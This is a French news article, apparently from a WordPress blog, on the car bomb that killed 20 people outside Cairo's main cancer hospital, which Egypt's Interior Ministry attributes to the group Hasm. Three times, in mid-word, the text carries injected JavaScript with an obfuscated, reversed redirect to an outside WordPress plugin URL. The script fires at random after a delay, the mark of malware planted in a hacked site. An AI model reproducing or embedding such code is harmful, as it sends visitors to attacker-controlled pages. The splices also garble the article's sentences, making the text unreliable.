AFRIQUESECURITETERRORISME

Egypte : la voiture qui a provoqué une explosion au Caire transportait des explosifs, selon le ministère de l’Intérieur

La voiture, qui a provoqué une explosion dans laquelle 20 personnes ont trouvé la mort dans le centre du Caire, transportait des explosifs, a annoncé lundi dans un communiqué le ministère égyptien de l’Intérieur.

“La voiture devait être utilisée dans une opération terroriste”, indique le communiqué.

La police a déclaré que la voiture avait été volée plusieurs mois auparavant, et que le groupe Hasm, un mouvement armé affilié aux Frères Musulmans, l’avait préparée en vue de commettre un attentat.

Vingt personnes ont été tuées et 47 autres blessées lorsque la voiture a percuté trois autres véhicules circulant dans la direction opposée.

Le président égyptien Abdel Fattah al-Sissi a décrit l’explosion comme un “incident terroriste”.

“J’adresse mes plus sincères contoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doléances au peuple égyptien et aux familles des martyrs tués dans ce lâche incident terroriste”, a déclaré le président sur ses comptes Facebook et Twitter.

L’explosion s’est produite lundi matin devant le principal hôpital de lutte contre le cancer du Caire.

La façade de l’hôpital a été entoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dommagée et les patients ont été évacués, selon le ministère de la Santé.

Le Procureur égyptien a ortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné l’ouverture immédiate d’une enquête sur l’incident.

%d blogueurs aiment cette page :